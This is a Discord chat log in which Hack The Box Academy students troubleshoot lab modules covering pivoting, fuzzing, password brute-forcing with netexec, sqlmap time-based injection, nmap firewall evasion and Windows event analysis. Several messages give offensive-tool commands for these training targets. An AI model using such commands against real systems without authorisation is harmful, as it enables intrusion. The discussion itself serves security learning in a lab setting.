Hey guys,
Does anyone know of a free alternative tool to a reverse image search like pimeyes?

leaden jacinth
sacred jacinth
safe star
#

U have to remember that

fathom pendant
storm elk
fathom pendant
#

Like locking your keys in the car

spring path
leaden jacinth
#

Does anyone have comptia certs?

fathom pendant
#

I'm sure some do

#

But what's your actual question turnip boy

storm elk
rustic sage
fathom pendant
rustic sage
#

What about on a physical machine, then?

fathom pendant
#

Only if you're paranoid

rustic sage
#

Physical machine it is then.

fathom pendant
#

?

#

Whatever boats your float

rustic sage
#

I just don't want someone close to me in the real world finding out my user password and looking on my laptop while I'm not there. They'd have to know the encryption key too.

short bone
#

trying to do the nessus skill assesment but i cant seem to get nessus to launch. im putting 'https://localhost:8834' into the firefox browser of the pwnbox and just cant get a connection

dawn snow
#

I am finishing the pivoting module but I keep having the same problem again. I struggle when performing host discovery in an internal network doing dynamic SSH port forwarding. Particularly when trying to detect windows targets which have ICMP disabled. Any idea how to speed up the host discovery?? By using another technique or smth...

fathom pendant
#

it'll be on the spawned target https://targetIP:8834/

#

nessus isn't installed on the pwnbox afaik

short bone
#

tried the targetIP as well from the browser in the pwnbox and same thing happened

#

im assuming the VM in the nessus skill assesment mentioned here is the pwnbox

fathom pendant
#

the target VM is the one that's spawned with "Click here to spawn target"

short bone
#

aaah okay, once i spawn the target what do i do with the IP?

#

trying to connect to that targetIP:8834 still gives the same result

hallow kiln
short bone
#

yes thats what im doing. getting a connection error

hallow kiln
#

can you share a screenshot?

short bone
#

i think something is wrong with my internet cause i tried to restart the machine and ive been stuck on this screen for 10 minutes

buoyant merlin
#

Hello,

Apologies if this is a dumb question/issue, I would appreciate any help or support.

I'm encountering an issue with ICMP Tunneling with SOCKS in the Pivoting, Tunneling, and Port Forwarding module

When running:

sudo ./ptunnel-ng/src/ptunnel-ng -r10.129.37.87 -R22

I get this error:

./ptunnel-ng/src/ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory

This happens on the Ubuntu pivot host (10.129.37.87), which doesn't have internet access.
Here’s what I did:

  1. Cloned the repository:

git clone https://github.com/utoni/ptunnel-ng.git

  1. Navigated to the directory:

cd ptunnel-ng/

  1. Ran the autogen script:

./autogen.sh

  1. Transferred the directory to the pivot host using SCP:

scp -r ptunnel-ng ubuntu@10.129.37.87:~/

Should these dependencies be statically linked before transferring ptunnel-ng? Or should it be rebuilt with the dependencies on the pivot host? Could this be an issue with the pivot host itself? Any help or clarifications would be appreciated.

plucky hollow
#

in wireshark when i try to filter by mac address the syntax is hw_mac or hw.mac?

wanton idol
faint light
#

hey does anyone test malwares and ransomewares for fun or is it just me?

next oxide
#

guys I have been stuck at a section for like an hour now and only found out what to do by researching for an answer online and I really want to know if I did anything wrong or misunderstood something

#

anybody has a few minutes to spare?

#

I didn't get the robots.txt as a result even though robots is in the namelist

smoky tapir
#

Hey all I am pretty new to pentesting / HTB I'm almost done with the NMAP module in academy and some walkthroughs in Labs.

I am a web programmer by trade that has been working on his own Cryptographic Libraries for about 1.5 years in C#/Rust through an FFI layer, I didn't write the algos myself but I constructed a usable library in most cases. I've worked on my own authentication systems quite a bit because I find security interesting. What module in academy is worth purchasing for someone like me? I also have some Active Directory experience from years ago as an Admin. I still wanna get my lab up and running for some YouTube videos there.

I don't have enough cubes at the moment so I would have to buy which is fine.

fading cipher
#

You should probably start with the free tier0 stuff

autumn dune
#

Yoo

#

Can newbies type in general

plucky hollow
smoky tapir
#

I have 16 cubes, I just picked up "Setting Up" for 10.

autumn dune
#

Do u guyz like kali or has anyone used black arch before

plucky hollow
autumn dune
#

I have a arch install with hyprdots config, and I started reading some books. Got some different distros. Just curious since Kali is Debian based, and arch uses Pac-Man

smoky tapir
#

Ah they told me to ask here. My bad 😆

autumn dune
#

I don’t have access to general chat atm so this is kinda the only place to ask questions

plucky hollow
safe star
fading cipher
shut vapor
autumn dune
plucky hollow
#

idk then butWell then I'm not sure where you should ask, but regarding the price of the modules I recommend doing all the tier 0 ones and then moving on to the next ones since the higher the difficulty the higher the price.

safe star
#

some tools on arch are really outdated and dont work

#

in my experience

autumn dune
#

I’ve looked through the tools and they have a lot however Kali is probably tested and updated more regularly

fading cipher
#

Parrot and Kali are both Debian based, either is fine I wouldnt do black arch unless you wanna really customize your life and converting tools

smoky tapir
#

I am missing something then because I didn't see a bunch of free ones that last time I looked but that was months ago. Thanks I'll take another deeper look and see what is out there.

fading cipher
smoky tapir
#

Thanks!

safe star
autumn dune
#

Nice

#

I like hyprland and the hyprdot look and feel but I use both as a vm. Arch and kali

next oxide
autumn dune
#

I would send a video but don’t have access to posting photos or videos atm

shut vapor
next oxide
#

Getting Started; Section Web Enumeration

safe star
#

ur looking for robots.txt?

#

i found it in 20 seconds

#

that wordlist u choose is really big and doesnt have robots.txt

safe star
shut vapor
#

Ok, I'm sitting down and gave it a shot. Your wordlist will work (but it is huge), but you need to use the -x argument to specify an extension. It will find both the wordpress directory and robots.txt.

#

I guess you can use a wordlist that contains both directories and files, but using the extension argument seems more flexible.

shut vapor
safe star
#

kinda confused where u got that wordlist tho

#

i cant find it in the section

shut vapor
#

eh. I tended to experiment with wordlists through those modules instead of exactly what was in the reading myself.

next oxide
#

My pc Internet just went out so got on my phone

next oxide
next oxide
safe star
#

/usr/share/dirb/wordlists/common.txt

#

probably diff on ur machine

safe star
next oxide
#

Yeah I will try it in a second when my internet goes back up in a second

#

just it is 1am already and wont be able to sleep if I dont know how to make it work lol

#

Error: flag needs an argument: 'x' in -x

#

okay so the -x didn't work, and the common.txt file from the site just doesn't exist at that location and found another in /usr/share/seclists/Discovery/Web-Content/common.txt .
And now I also got the exact result I found in the YT Videos and the guide on the page

#

Just for refrence, the path doesnt lead to the file

safe star
#

Yeah you will have to use the “locate” command to find stuff depending on the distro

fathom pendant
#

I had issues with getting gobuster to get the extension

#

Worked fine with ffuf

#

Literally the similar syntax just replacing x with e

#

Also -x requires at least one extension

safe star
#

Yeah, and ffuf is super fast

fathom pendant
#

Which is why it yelled at you

fathom pendant
#

Fuzz [fast]er u fool

next oxide
#

I guess it changed over time and it didn't get updated maybe? just confused

fathom pendant
#

Literally within the last month or two

next oxide
#

Ahh okay I have been on a wild goose chase for the last like 1 1/2 hours to find that one file

fathom pendant
#

And from what I hear, it's a major PITA to update the guides

next oxide
#

or thought I had an error in the line or smth

fathom pendant
#

The seclist common.txt is the same thing

#

With a handful more lines

#

Source: I've run a diff on them

next oxide
#

I just got htb a couple days ago so no wonder

#

thank you for the info though 😭 🙏

fathom pendant
#

👍

#

They're likely working on updating guides and such and gonna push a mass update to them

#

As I've been told, updating them individually is a PITA

next oxide
#

Like as a question from my side, how do you just remember all these lines and commands and tools when at some point doing actual practices on mashines

#

I am so overwhelmed rn with all the tools I am getting thrown at

fading cipher
#

do it for a year or two

#

youll remember most of them

#

besides that just take notes and use googles

safe star
fading cipher
#

also remember -h and man are your friends

safe star
#

Never seen that

fathom pendant
#

And notes

fathom pendant
#

If you're unsure why 2 files that should be the same, aren't

#

One of the random things that I saw happen was downloading something from the site via a download button resulted in a file with CRLF characters [common for windows] instead of new line [for other OS], so it wasn't working properly

#

diff showed every line was different, even though they appeared the same

fading cipher
#

Is there a maximum duration for Password attack modules recommended?

fathom pendant
fading cipher
#

ok

fathom pendant
#

There's some bits that are somewhat intentionally a bit longer

#

But it's slightly more realistic

#

Not everything is gonna be instant

fading cipher
#

I mean sure but I also have to manage my time

#

that and when I have a server with 8 a100s in it, it does be going fast

#

oh okay you have to download shit from the website for your list

fathom pendant
#

If there's a resources button there's a non-zero chance it's needed

fading cipher
#

Are they per section or per whole module?

#

They should put the button here

#

htb is free to use this in their design documentations

fathom pendant
#

And the download is usually near the top

fading cipher
#

ew even worse

fathom pendant
#

¯_(ツ)_/¯

#

It's a button labeled "resources"

fading cipher
#

yeah I got it

#

just didnt know I even needed it

fathom pendant
#

Also idk how you got to that point iirc you needed to create a mutated wordlist prior to that section

fading cipher
#

no

#

this is the first section

fathom pendant
#

Ah

#

Ok

#

But yeah the password and user list is super useful here

fading cipher
#

its deff shorter then seclist username and rockyou

fathom pendant
#

You should basically never use rockyou for bruteforcing

frosty geyser
#

hi

safe star
#

yo

cloud urchin
#

i only use rockyou2024 for bruteforcing Kappa

plucky hollow
#

i use rockyou for fuzzing ☠️

fathom pendant
#

God your fuzzing must take ages

autumn dune
#

How do u get access to type in general

cloud urchin
fading cipher
#

waited 40 minutes no luck

#

revert box hydra finds brute force in like 2 minutes ☠️

swift carbon
#

hey were you able to figure this out? i'm wanting to practice that method as well

fathom pendant
#

@wary tendon ; did you log out and back in?

#

also many people do AEN blind as the module itself is the walkthrough

#

so it's a bit more taboo to ask about that module

#

with windows whenever you make changes to a user you are logged in as, the changes don't take place until the next user log on

wary tendon
#

I've been trying but its difficult. Do you mean log out of rdp and back in again?

fathom pendant
#

yes

#

not closing your RDP window

#

actually clicking on "Log Out/Sign Out"

wary tendon
#

I just signing out

#

In windows right in the rdp session

fathom pendant
#

from the windows menu

#

¯_(ツ)_/¯

wary tendon
#

No I have not🥲

#

I guess for the changes to take effect

#

I shall see thanks ill give it a shot tomorrow

#

Even signing in though from the same session after adding to group didn't work

#

I mean running cmd and ps as admin

fathom pendant
#

did you try selecting other sign in options when trying to run as admin?

#

:)

wary tendon
#

Would changes not take effect automatically

fathom pendant
#

once relogged, yes

ember dune
fathom pendant
#

Windows dislikes making changes to objects that are in use

fathom pendant
wary tendon
#

Ok I have not reblogged out and in

fathom pendant
fathom pendant
#

and the username list?

ember dune
fathom pendant
#

syntax?

ember dune
#

what am i missing?

fathom pendant
#

just ran it on my machine (with netexec) and it worked just fine

ember dune
fathom pendant
#

i got the answer just fine for me

#

¯_(ツ)_/¯

#
md5sum username.list password.list 
75cc560d46286d74e73b85b2a5183e63  username.list
c75d6ec1311119028b89edaca8240603  password.list
ember dune
#

in my case it(bruteforce) goes on and on

fathom pendant
#

it will take a few minutes

#

don't expect much instant gratification from this module

#

this is definitely a module that tests patience

ember dune
fathom pendant
#

it definitely shouldn't take 30 minutes

#

try respawning your target

#

also just as a sanity check can you verify your username.list and password.list md5sum matches mine?

ember dune
#

75cc560d46286d74e73b85b2a5183e63 username.list
c75d6ec1311119028b89edaca8240603 password.list

#

it is same

fathom pendant
#

ok

#

then i suggest restarting the target

#

and trying again

ember dune
fathom pendant
#

it's used in the next section

#

and explained there

ember dune
fathom pendant
#

Note; during this conversation I ran it twice and got the expected login info

ember dune
fathom pendant
#

netexec

#

netexec is crackmapexec

#

it's literally the same devs that were maintaining the cme tool, and then a dispute happened and now we have netexec

#

cme has been archived for a while at this point

ember dune
ember dune
fathom pendant
#

The user and password aren't at the bottom of these lists

#

Netexec rotates through usernames first

#

So it'll try the first password against all users, then second...

plucky hollow
#

Why when trying to resolve some domain names it returns something like 192.168.0.1.in-addr.arpa that part after the IP?

jaunty mortar
#

Any one completed "ADVANCED XSS AND CSRF EXPLOITATION" section "XSS Filter Bypasses"?
Been stuck for days, I managed to bypass using <iframe> payload but cant trigger admin page

jaunty mortar
crimson moon
#

Is it only mine or do you guys also experience issue when opening HTB academy inside pwnbox browser to download a file let’s say nix.zip ?? It weirds out by flickering the screen and constantly changing the size of the pwnbox inside the browser making it difficult to navigate

glass quail
quiet trout
quiet trout
#

cope, like i do 😛

crimson moon
#

Hahaha…Tried doing that for like 15 mins or so but frustrated now since I wasn’t able to download a single attached file to complete the task at hand 🥲

fringe shell
#

Does anyone know the problem with the Windows Fundamental Module? I can't connect to the target through RDP, I can't ping it, even the Pwnbox can't connect. But other modules are working fine.

quiet trout
#

ok so min/max the window or just drag to resize it should stop wigging out, for a bit

#

also if you have two monitors put the module in a new window on the other screen, may help a bit

plucky hollow
#

why this not working: ip.addr matches ".237$"

quiet trout
#

wireshark? i think its ip.addr == "..."

#

@plucky hollow ^

plucky hollow
rustic sage
#

Hello, I am trying to solve the GET parameter fuzzing assessment from Attacking Web Application with Ffuf module of CBBH. For fuzzing the parameter first I tried to fuzz the directory, could not get anything useful from the main domain, so tried to fuzz on VHost. But, the VHost is not reachable and I couldn't fuzz it's directory. If someone is familiar with this one, can you tell me where I went wrong.

plucky hollow
#

every virtual host need to be added by your local DNS resolution because the domain name of target in this case is not publicly registered

rustic sage
#

I added the main domain on /etc/hosts and thought that would work. Alright, let me try

quiet trout
#

oops nvm i thought this was a box

#

double check host file

misty current
#

Definitely the lack of the admin.academy.htb in the hosts file

midnight flume
#

hey guys, just starting out on HTB academy right now as a super beginner and was wondering if i should start the "Cracking Into HTB" skill path or the "Info Sec Fundamentals" skill path first.
I have already completed the following:
Intro to HTB
Setting Up
Learning Process
any tips on where to go now?

dim wolf
midnight flume
zenith canopy
#

Module - Footprinting, Section - DNS, The final question in the DNS lab asks you to find the hostname of an IP that ends in 203. I tried brute-forcing subdomains, but I was unable to find it. When I looked at the answer, it tells the student to brute-force dev.inlanefreight.htb. Does this mean that you have to try to brute-force every subdomain you have learned from the zone transfer, because all I was trying to brute-force was inlanefreight.htb?

zenith canopy
plucky hollow
#

map each subdomain with the target ip for local dns resolution

zenith canopy
drifting grail
#

Anyone can give a nudge on the "Whitebox Attacks" Module - Section Client-Side Prototype Pollution?

I got the local XSS payload, but when sending it to the admin it does not work and no callback is returned

plucky hollow
#

why "Hypertext Transfer Protocol" is HTTP AND NOT HTP

zenith canopy
# plucky hollow map each subdomain with the target ip for local dns resolution

Hi, i'm kinda confused, why do we need to map lets say dev.inlanefreight.htb to an IP in order to brute force because with dnsenum for each subdomain in the wordlist, we query the dns server to check if the hostnames exists for dev.inlanefreight.htb, so whats the point of mapping dev.inlanefreight to an IP for local resolution?

gray cloud
#

Hello Guys, here to bump this message from a year ago, this still hasn't been solved, it doesn't prevent you from doing the challenge but I think it should be patched

#

What's going on ? :
the command curl -i -X OPTIONS http://SERVER_IP:PORT/ returns the webpages (including its flag in the body's response tho) but doesn't contain the Allow: header
What's expected ? :

[!bash!]$ curl -i -X OPTIONS http://SERVER_IP:PORT/

HTTP/1.1 200 OK
Date: 
Server: Apache/2.4.41 (Ubuntu)
Allow: POST,OPTIONS,HEAD,GET
Content-Length: 0
Content-Type: httpd/unix-directory
autumn pilot
smoky marten
#

do I need to worry about overwhelming the target systems in modules?

grand portal
#

as long as you are not performing dos and ddos attack. it's fine

smoky marten
#

alright

smoky marten
grand portal
smoky marten
#

I wouldn’t, dw

grand portal
#

cool

shut vapor
#

So is there a more precise term for "password spraying" but using hashes instead?

#

"Hash spray" I guess. Seems like some people use the phrase.

midnight galleon
#

how can i make sqlmap faster?
time based sql just takes an hour to dumb 1 row even with knowladge of the db type db name and table name
this is my current configs
sqlmap -r request.req --batch -T users -C username,password -D htbdb --dump --level=3 --risk=3 --threads=10 --skip=dbs,hostname --technique=T

sly kelp
wild harbor
#

how to do please

storm elk
wild harbor
storm elk
#

Like which commands?

#

Feel free to dm me for further help. As it's a tier 2 module

grand portal
#

could you help with this? @storm elk

storm elk
grand portal
#

thanks.

#

when you know, you have outworked yourself-

storm elk
median gale
#

Did you manage to solve your second question ?

median gale
#

What?

mossy aurora
#

Hi, i'm doing SOC path in HackTheBox Academy and i have a question.

Windows Event Logs
Windows Event Logging Basics
Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: TW__.exe
I don't even know how to start doing it...i have problem with it:
Practical Exercises
Navigate to the bottom of this section and click on Click here to spawn the target system!

Now, RDP to [Target IP] using the provided credentials, open Windows Event Viewer, and answer the questions below.

How to connect RDP with target IP? Should i do it from Pwnbox on site or should i download something to my VMbox or can i do it on my Windows PC?

analog dock
#

I use xfreerdp, but you can also use remmina

mossy aurora
analog dock
#

I use kali

#

Idk if parrot has it already

#

The pwnbox on site should have it

mossy aurora
rapid thorn
wary plover
midnight galleon
#

i know that time based sqli takes long time to be done

#

but man this is just toasting the server

autumn void
#

Hey guys! Anyone encountered this issue on the module Windows Event Logs & Finding Evil-Tapping Into ETW: After I started capturing ETW events I created the cmd command process form spoolsv.exe but I cannot find any process id info in the etw.json file. No log info about this spoolsv.exe.

full patio
#

Guys, I'm currently working through Firewall and IDS/IPS Evasion - Hard Lab in the Network Enumeration with Nmap module and having some difficulty getting the flag...

So far I've tried the following against ports ||TCP 21, 139, 445

  • SYN scan -sS
  • ACK scan -sA
  • Decoy scan -D RND:5
  • Specifiying a different source IP address (couldn't get this to work)||

Can anyone offer any advice?

An example of my latest scan: ||sudo nmap 10.129.xx.xx -p 139,445 -Pn -n --disable-arp-ping -sS -sV --reason --source-port 53|| - just results in ports showing as filtered 🤷‍♂️

smoky hare
#

I am currently doing the skills assessment on HTB Academy running gobuster and have my vhosts added to the /etc/hosts but I am not finding any directories at all. Anyone have any guidance?

#

This is the Info gatahering-web edition module

plucky hollow
plucky hollow
smoky hare
#

I haven't found any subdomains at all yet

plucky hollow
twin bridge
# smoky hare I haven't found any subdomains at all yet

refresh your HTB academy page and make sure your target machine is still active and the IP address is still the same...sometimes it will show that the target machine is still active and has minutes left but it's actually expired or terminated for no reason...i

smoky hare
#

gobuster vhost -u http://targetsite.com:PORT -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

smoky hare
#

and in my /etc/hosts file I have the target IP as well as the target vhost

plucky hollow
smoky hare
#

No errors

plucky hollow
smoky hare
#

sec

twin bridge
# plucky hollow ?? dont confuse him please

I'm not I had the same exact problem I was running a fuzzing scan on a terminated instance and wasn't getting any results....until I refreshed the HTB academy module page and saw that the target IP address is not showing any more and had to request a new one

#

And it worked right after

smoky hare
#

@twin bridge I appreciate it but that is not what is happening in my instance

full patio
fathom pendant
smoky hare
fathom pendant
#

Your account needs to be linked to send images

plucky hollow
jolly maple
#

Is there anyone who could help me with the WEB Requests POST Lab?

plucky hollow
fathom pendant
fathom pendant
#

Oop discord moved as I replied

jolly maple
#

I'm at the section where you do a search for a city, and we're supposed to observe a request to search.php but I can't get that far because of a CORS error message.

smoky hare
#

Yeah I am running ffuf and no dice either @plucky hollow

plucky hollow
smoky hare
plucky hollow
plucky hollow
#

and you need :FUZZ after the wordlist

fathom pendant
#

Also as tom said, you use the spawned port. Very rarely will the targets be running TLS

fathom pendant
smoky hare
#

I used http as well already

#

sorry I should have clarified

fathom pendant
#

:p

plucky hollow
smoky hare
#

Aight I did that on gobuster but it didn't work I will try it on ffuf appreciate yalls help 🙂

fathom pendant
#

It's implied

analog dock
smoky hare
#

Yeah I did

plucky hollow
fathom pendant
#

The only time you specify is if using multiple wordlists

analog dock
#

And you’re fuzzing directories now, not subdomains

plucky hollow
fathom pendant
#

No? He's trying to fuzz subdomains

#

Oh wait nvm

#

I need to wake up more

analog dock
fathom pendant
#

His original message was subdomain fuzzing

analog dock
#

Yeah and so is his wordlist

#

But that’s not where he’s doing the fuzzing

fathom pendant
#

Didn't realize he switched to directory fuzzing somewhere in the middle

analog dock
#

All good

fathom pendant
#

Anyway Tom's got a handle on this I'm gonna go get me an Irish Creme Monster Java

hasty lantern
#

is there a clipboard for HTB academy pwnbox? I only see "hide all windows" shortcut there at the place of the usual clipboard

analog dock
fathom pendant
#

Aside from that, ctrl+shift+v can paste just fine

hasty lantern
#

ty

upbeat oak
#

Quick question, for the attacking common services module attacking sql databases. For the questions are we supposed to use sqlcmd like they did in the explanation? I don't seem to have that in my repository. Would it be simpler to just use an instance?

fathom pendant
#

Iirc the section details like several different connection tools

digital crown
#

hello I have problem regarding module 'Active Directory Enumeration & Attacks' - 'Bleeding Edge Vulnerabilities' section
It's about second exploit- PrintNightmare
For some reason "The system cannot find the file specified"I cant transfer my payload as part of cve to my target. I think the issue lies within python version but I'm not sure, on first look specified paths look the same

#

eventually there's a problem with escaping "\b" character?

fathom pendant
#

Language/locale settings

#

The targets are normalized to british/us qwerty

plucky hollow
fathom pendant
#

¯_(ツ)_/¯

mossy drift
#

@autumn void but have you follow the steps correctly

autumn void
mossy drift
#

I had no problem with this module, did you launch silview, do the spoof and exit silkview ?

#

In case, try to find the event in event view

#

With the correct EventID and Pid as the course explain

autumn void
#

Maybe I am not launching it properly… How did you launch and exit the silkview?